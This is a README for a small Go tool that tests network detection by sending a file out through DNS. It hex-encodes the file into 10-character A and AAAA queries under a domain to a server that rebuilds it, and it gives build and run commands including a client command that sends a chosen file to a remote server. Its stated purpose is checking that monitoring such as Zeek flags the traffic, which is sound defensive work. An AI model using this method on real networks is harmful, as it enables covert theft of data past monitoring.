This is a very basic file exfiltration tool that uses DNS A and AAAA records to exfiltrate files. This is a simple tool to easily test for detections for file exfiltration via DNS. The client sends the specified file as both A and AAAA requests, and currently the server responds just to A record requests with a bogus IP response. If Bro (Zeek) is being used, this tool should flag for anomalous dns traffic.
To Use: Server Side
cd dns-exfil-test/server
go mod init server/v2
go get github.com/miekg/dns
go build
./server
To Use: Client Side
cd dns-exfil-test/client
sed -i -e 's|127.0.0.1|[SERVER_IP]|g' go-dnsclient.go
go mod init dns-exfil-text/client
go build
./client [file_to_send]
the client will then read the contents of the file, hex encode it, and send it in 10 character chunks as A record requests. The format of each request is:
[10 hex encoded characters].macconsultants.com
Once done the server will take all of the hex encoded data, combine, and unhexlify it to a file as ASCII in the same directory. The output file is called outfile.
The server will not indicate when done but the client does. Once the client says it is done, you can kill the server and view the contents of outfile.
You will need to rename the outfile if you want to send multiple files.